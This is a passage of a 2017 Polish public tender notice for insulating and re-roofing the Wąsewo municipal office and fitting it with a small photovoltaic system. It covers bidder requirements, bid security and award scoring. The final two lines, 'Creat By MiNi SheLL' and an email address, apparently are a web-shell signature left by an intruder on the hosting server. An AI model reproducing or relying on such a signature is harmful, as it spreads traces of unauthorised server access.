 -  1 robotę budowlaną, która odpowiada swoim rodzajem przedmiotowi zamówienia, tj. polegającą na termomodernizacji budynku o wartości minimum 450.000,00 zł brutto (każda)  załącznik nr 9 do SIWZ;
Część II:
-  udokumentowanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie minimum dwóch robót budowlanych polegających na wykonaniu instalacji fotowoltaicznej o mocy min. 4 kWp oraz wartości nie mniejszej niż 30.000,00 zł brutto (każda) załącznik nr 9 do SIWZ; 

b) wykaz osób, kierowanych przez Wykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, jeśli Wykonawca wykaże, iż dysponuje personelem zdolnym do wykonania zamówienia, tj.:
Część I:
- min. 1 osobą która będzie kierownikiem budowy posiadającą wykształcenie wyższe i uprawnienia do kierowania robotami budowlanymi bez ograniczeń w branży konstrukcyjno-budowlanej załącznik nr 10 do SIWZ, 
- min 1 osobą która będzie kierownikiem robót w specjalności sanitarnej załącznik nr 10 do SIWZ, 
Część II:
- min 1 osobą która będzie kierownikiem robót w specjalności elektroenergetycznej  załącznik nr 10 do SIWZ,
- wskazanie jednej osoby posiadającej ważny certyfikat instalatora OZE wystawionego przez Prezesa Urzędu Dozoru Technicznego w zakresie instalacji fotowoltaicznych. 
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Wypełniony formularz ofertowy  załącznik nr 1a  i/lub 1b  do SIWZ.

2) Wykaz oświadczeń lub dokumentów składanych przez wykonawcę w celu wstępnego potwierdzenia, że nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu:
- oświadczenie o spełnieniu warunków udziału w postępowaniu  załącznik nr 2 do SIWZ,
- oświadczenie o niepodleganiu wykluczeniu  załącznik nr 3 do SIWZ

3) pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli  Wykonawca składający ofertę będzie korzystał z zasobów innych podmiotów  załącznik nr 5 do SIWZ.

4) Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej co najmniej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty; oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru), to do oferty należy dołączyć pełnomocnictwo, wystawionego na reprezentanta Wykonawcy przez osoby do tego uprawomocnione.Wszelkie pełnomocnictwa załączone do oferty powinny być w formie oryginału lub poświadczonej notarialnie kopii.
Żadne dokumenty wchodzące w skład oferty, w tym również te przedstawiane w formie oryginałów, nie podlegają zwrotowi przez Zamawiającego.

5) Dowód wpłaty wadium.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości: zadanie częściowe nr 1  10.000,00 zł. w terminie do dnia 28.04.2017r. do godz. 10:00, zadanie częściowe nr 2  700,00 zł w terminie do dnia 28.04.2017r. do godz. 10:00.  
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wniesione w następujących formach: 
 - pieniądzu, 
 - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
   z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
 - gwarancjach bankowych, 
 - gwarancjach ubezpieczeniowych, 
 - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014 r poz. 1804 oraz z 2015 r. poz.978 i 1240).
Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej,  poręczeniach  w formie oryginału należy umieścić w kopercie z ofertą, natomiast kopię należy zamieścić w ofercie.
Wadium   wnoszone   w   pieniądzu   należy  wpłacić  przelewem na  konto Bank Spółdzielczy w Wąsewie 37 8930 0004 0000 0837 2000 0320
z dopiskiem na przelewie Wadium i oznaczyć TYTUŁ PRZETARGU lub numer referencyjny.
Wadium musi być wniesione najpóźniej do dnia 28.04.2017r. godz. 10:00.
Za skutecznie wniesione wadium w  pieniądzu Zamawiający  uważa wadium, które do dnia 28.04.2017 r., do godz. 10:00 włącznie, znajdzie się na koncie Zamawiającego. Zamawiający wymaga załączenia do oferty potwierdzenia dokonania wpłaty wadium.
Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ jego oferta zostanie odrzucona na podstawie  art. 89 ust. 1 pkt 7b ustawy Prawo zamówień publicznych .
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto</td><td>60</td></tr><tr><td>doświadczenie zawodowe kierownika budowy </td><td>20</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polsi<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Termomodernizacja budynku Urzędu Gminy Wąsewo w zakres, którego wchodzą zadania polegające na: dociepleniu stropu nad piętrem budynku, dociepleniu ścian zewnętrznych, wymianie stolarki drzwiowej, wymianie oświetlenia led, wymianie pokrycia dachowego, roboty budowlane związane z kanalizacją deszczową, kominem ze stali kwasoodpornej oraz remontem sali konferencyjnej.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Termomodernizacja budynku Urzędu Gminy Wąsewo w zakres, którego wchodzą zadania polegające na: dociepleniu stropu nad piętrem budynku, dociepleniu ścian zewnętrznych, wymianie stolarki drzwiowej, wymianie oświetlenia led, wymianie pokrycia dachowego, roboty budowlane związane z kanalizacją deszczową, kominem ze stali kwasoodpornej oraz remontem sali konferencyjnej.

Szczegółowy opis przedmiotu Zamówienia stanowi dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót (STWiOR), Audyt Energetyczny, przedmiar robót (element pomocniczy), SIWZ, projekt umowy jako załącznik nr 8.
Powyższy zapis dotyczy każdej części.
Wykaz dokumentacji branży budowlanej, elektrycznej i sanitarnej:
1.Projekt Budowlany - część 1 przedmiotu zamówienia, 
2.Audyt Energetyczny - część 1, część 2 przedmiotu zamówienia,
3.Przedmiary robót - część 1 przedmiotu zamówienia,
4.Program Funkcjonalno-Użytkowy  część 2 przedmiotu zamówienia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71200000-0,
                    71000000-8,
                    71300000-1,
                    71314100-3,
                    71320000-7,
                    71321000-4,
                    71326000-9,
                    45300000-0,
                    44112410-5,
                    45310000-3,
                    45315700-5,
                    45231000-5,
                    45453000-7,
                    45320000-6,
                    45331210-1,
                    45330000-9,
                    45421000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 15/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto </td><td>60</td></tr><tr><td>doświadczenie zawodowe kierownika budowy </td><td>20</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Kryterium cena ofertowa brutto: 60 % = 60 pkt
Pco = (Cn : Co) x 60
gdzie: Pco  punkty dla badanej oferty w kryterium cena ofertowa brutto; 
Cn  cena najniższa w zbiorze ofert;
Co  cena badanej oferty.

Kryterium Doświadczenie zawodowe Kierownika Budowy: będzie rozpatrywane na podstawie złożonego przez Wykonawcę oświadczenia na Formularzu ofertowym
Znaczenia kryterium  20 % = 20 pkt
Wykonawca wskaże do pełnienia funkcji Kierownik Budowy osobę posiadającą większe
doświadczenie zawodowe, niż wymagane w warunkach udziału w postepowaniu opisane w  punkcie 5.3.3)c zdolność techniczna lub zawodowa  osób. Zamawiający przyzna następującą ilość punktów:

w części I
a) doświadczenie zawodowe spełniające warunek udziału w postepowaniu - wykonanie 1
zadania o wartości min 450 000,00 zł. brutto  0 pkt
b) doświadczenie zawodowe spełniające warunek udziału w postepowaniu - wykonanie 2
lub 3 zadań o wartości min 450 000,00 zł. brutto  10 pkt
c) doświadczenie zawodowe spełniające warunek udziału w postepowaniu - wykonanie
więcej niż 3 zadań o wartości min 450 000,00 zł. brutto  20 pkt 

Kryterium Okres realizacji zamówienia:  20 % = 20 pkt

Ocena dokonana zostanie na podstawie okres realizacji zamówienia w dniach  zadeklarowanego przez Wykonawcę w  Formularzu Ofertowym.
Najdłuższy możliwy okres realizacji zamówienia przyjęty do oceny oferty przez Zamawiającego:  T max = 90 dni od dnia podpisania umowy.
Wykonawca może zaproponować okres realizacji zamówienia w dniach tj. do 60 , do 75 lub do 90 dni. 
Ilość punktów w tym kryterium zostanie naliczona zgodnie z poniższa tabelą
Okres realizacji zamówienia/Ilość punktów
do 60 / 20
od 61 do 75 / 10
od 76 do 90 / 5

Najkorzystniejsza oferta Pkt = Pco +D + T

Pkt = suma punktów w badanych kryteriach oceny ofert (końcowa ocena oferty), która będzie stanowić końcową ocenę oferty.
<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Termomodernizacja budynku Urzędu Gminy Wąsewo, w zakres, którego wchodzą zadania polegające na: zaprojektowaniu i zrealizowaniu dostawy, montażu i uruchomieniu instalacji fotowoltaicznej o mocy ok. 4 kWp na dachu budynku Urzędu Gminy w Wąsewie.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Termomodernizacja budynku Urzędu Gminy Wąsewo, w zakres, którego wchodzą zadania polegające na: zaprojektowaniu i zrealizowaniu dostawy, montażu i uruchomieniu instalacji fotowoltaicznej o mocy ok. 4 kWp na dachu budynku Urzędu Gminy w Wąsewie.

Wykonanie prac zgodnie z wymaganiami i informacjami opisanymi przez zamawiającego i zawartymi w Programie Funkcjonalno-Użytkowym (PFU), dla zaprojektowania i wykonania budowy oraz uruchomieniu instalacji w zakresie Części II. 

Szczegółowy opis przedmiotu Zamówienia stanowi dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót (STWiOR), Audyt Energetyczny, przedmiar robót (element pomocniczy), SIWZ, projekt umowy jako załącznik nr 8.
Powyższy zapis dotyczy każdej części.
Wykaz dokumentacji branży budowlanej, elektrycznej i sanitarnej:
1.Projekt Budowlany - część 1 przedmiotu zamówienia, 
2.Audyt Energetyczny - część 1, część 2 przedmiotu zamówienia,
3.Przedmiary robót - część 1 przedmiotu zamówienia,
4.Program Funkcjonalno-Użytkowy  część 2 przedmiotu zamówienia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45261215-4,
                    71200000-0,
                    71000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 15/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa brutto </td><td>60</td></tr><tr><td>doświadczenie zawodowe kierownika budowy </td><td>20</td></tr><tr><td>termin realizacji zamówienia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Kryterium cena ofertowa brutto: 60 % = 60 pkt

Pco = (Cn : Co) x 60

gdzie: Pco  punkty dla badanej oferty w kryterium cena ofertowa brutto; 
Cn  cena najniższa w zbiorze ofert;
Co  cena badanej oferty.

Kryterium Doświadczenie zawodowe Kierownika Budowy: będzie rozpatrywane na podstawie złożonego przez Wykonawcę oświadczenia na Formularzu ofertowym
Znaczenia kryterium  20 % = 20 pkt
Wykonawca wskaże do pełnienia funkcji Kierownik Budowy osobę posiadającą większe
doświadczenie zawodowe, niż wymagane w warunkach udziału w postepowaniu opisane                    w  punkcie 5.3.3)c zdolność techniczna lub zawodowa  osób. Zamawiający przyzna następującą ilość punktów:

w części II
a) doświadczenie zawodowe spełniające warunek udziału w postepowaniu - wykonanie 2
zadań o wartości min 30 000,00 zł. brutto  0 pkt
b) doświadczenie zawodowe spełniające warunek udziału w postępowaniu - wykonanie 3
lub 4 zadań o wartości min 30 000,00 zł. brutto  10 pkt
c) doświadczenie zawodowe spełniające warunek udziału w postępowaniu - wykonanie
więcej niż 4 zadań o wartości min 30 000,00 zł. brutto  20 pkt 

Kryterium Okres realizacji zamówienia:  20 % = 20 pkt

Ocena dokonana zostanie na podstawie okres realizacji zamówienia w dniach  zadeklarowanego przez Wykonawcę w  Formularzu Ofertowym.
Najdłuższy możliwy okres realizacji zamówienia przyjęty do oceny oferty przez Zamawiającego: T max = 90 dni od dnia podpisania umowy.
Wykonawca może zaproponować okres realizacji zamówienia w dniach tj. do 60 , do 75 lub do 90 dni. 
Ilość punktów w tym kryterium zostanie naliczona zgodnie z poniższa tabelą.
Okres realizacji zamówienia / Ilość punktów
do 60/ 20
od 61 do 75 / 10
od 76 do 90 / 5

Najkorzystniejsza oferta Pkt = Pco +D + T

Pkt = suma punktów w badanych kryteriach oceny ofert (końcowa ocena oferty), która będzie stanowić końcową ocenę oferty.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com